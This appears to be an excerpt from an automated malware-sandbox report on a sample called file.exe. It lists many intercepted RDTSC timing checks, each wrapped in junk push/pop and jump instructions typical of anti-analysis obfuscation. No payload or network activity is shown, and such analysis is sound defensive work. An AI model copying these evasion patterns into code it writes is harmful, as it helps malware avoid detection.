          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA5F72 second address: BA5F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA5F78 second address: BA5F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007F17414E33F6h 0x0000000d jmp 00007F17414E33FFh 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA5F9F second address: BA5FBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F174075FE76h 0x00000008 jmp 00007F174075FE83h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA614A second address: BA6180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E3407h 0x00000009 popad 0x0000000a jl 00007F17414E3403h 0x00000010 jmp 00007F17414E33FBh 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA65DF second address: BA65E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA65E4 second address: BA65EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA65EA second address: BA661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jns 00007F174075FE76h 0x0000000c jmp 00007F174075FE86h 0x00000011 jl 00007F174075FE76h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA661A second address: BA661E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA661E second address: BA6627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BA6627 second address: BA6632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: BABC09 second address: BABC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F174075FE76h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BABC18 second address: BABC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB921 second address: BAB927 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC790 second address: BAC795 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC913 second address: BAC939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F174075FE7Bh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC939 second address: BAC949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F17414E33F6h 0x0000000a jno 00007F17414E33F6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC949 second address: BAC95F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007F174075FE76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F174075FE76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACBC9 second address: BACBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F17414E3406h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACBE7 second address: BACBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACBEC second address: BACBFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F17414E33FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29867 second address: B2986B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4E9C second address: BB4EA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4EA6 second address: BB4EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE82h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3397B second address: B3397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3397F second address: B33983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33983 second address: B3398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4A1 second address: BBA4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F174075FE76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA4B1 second address: BBA4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA7AE second address: BBA7BB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA941 second address: BBA946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAB93 second address: BBABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F174075FE76h 0x0000000a popad 0x0000000b jns 00007F174075FE7Ah 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD77C second address: BBD780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD780 second address: BBD786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD786 second address: BBD7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3409h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBD7A5 second address: BBD7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC38E1 second address: BC38E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2173 second address: BC218A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC218A second address: BC2196 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F17414E33F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC232D second address: BC2339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F174075FE76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2763 second address: BC276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC276D second address: BC2775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC28FB second address: BC2918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F17414E3403h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2918 second address: BC291E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC291E second address: BC2924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2924 second address: BC2929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2929 second address: BC292F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2A67 second address: BC2A71 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC2A71 second address: BC2A95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 jmp 00007F17414E33FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC35DC second address: BC35F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F174075FE7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC35F1 second address: BC3601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F17414E33F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3601 second address: BC3605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB775 second address: BCB779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC98C6 second address: BC98CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9A65 second address: BC9A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F17414E33FCh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA313 second address: BCA31D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F174075FE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA608 second address: BCA613 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA613 second address: BCA627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F174075FE76h 0x0000000a jne 00007F174075FE76h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAC85 second address: BCAC89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD42E7 second address: BD42EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3983 second address: BD399D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F17414E3405h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD399D second address: BD39DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F174075FE7Dh 0x00000008 jmp 00007F174075FE81h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007F174075FE7Ah 0x00000017 pushad 0x00000018 jmp 00007F174075FE7Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B13 second address: BD3B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F17414E33F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B1F second address: BD3B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B23 second address: BD3B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B27 second address: BD3B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F174075FE76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3B38 second address: BD3B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC8A3 second address: BDC8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA922 second address: BDA932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F17414E33FEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAA88 second address: BDAA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F174075FE7Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB49C second address: BDB4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F17414E3406h 0x00000011 jmp 00007F17414E33FEh 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push esi 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB783 second address: BDB787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB787 second address: BDB78B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB78B second address: BDB7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB7A9 second address: BDB7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB7AF second address: BDB7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDB7C3 second address: BDB7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDA49B second address: BDA4A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F174075FE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE40A5 second address: BE40B8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F17414E33FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE40B8 second address: BE40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4129 second address: BF414B instructions: 0x00000000 rdtsc 0x00000002 je 00007F17414E33F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17414E3404h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF414B second address: BF418A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F174075FE87h 0x00000010 pop edi 0x00000011 jns 00007F174075FE7Eh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F174075FE7Bh 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF614F second address: BF6196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F17414E3430h 0x0000000f jmp 00007F17414E3406h 0x00000014 pushad 0x00000015 jmp 00007F17414E3408h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CD5 second address: BF5CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB396 second address: BFB39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB39A second address: BFB3C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F174075FE7Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F174075FE7Eh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB3C6 second address: BFB3CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C017E9 second address: C017FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F174075FE7Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C017FF second address: C01808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01808 second address: C0180C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04325 second address: C0432F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17414E33F6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0432F second address: C0434C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0434C second address: C04350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04350 second address: C04377 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE87h 0x00000007 jnc 00007F174075FE76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04377 second address: C04394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3403h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F17414E33F6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04394 second address: C0439A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04191 second address: C04197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D09F second address: C0D0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA25 second address: C0BA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA29 second address: C0BA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F174075FE76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA38 second address: C0BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F17414E33FCh 0x0000000d jmp 00007F17414E3406h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F17414E3408h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA7D second address: C0BA93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE82h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
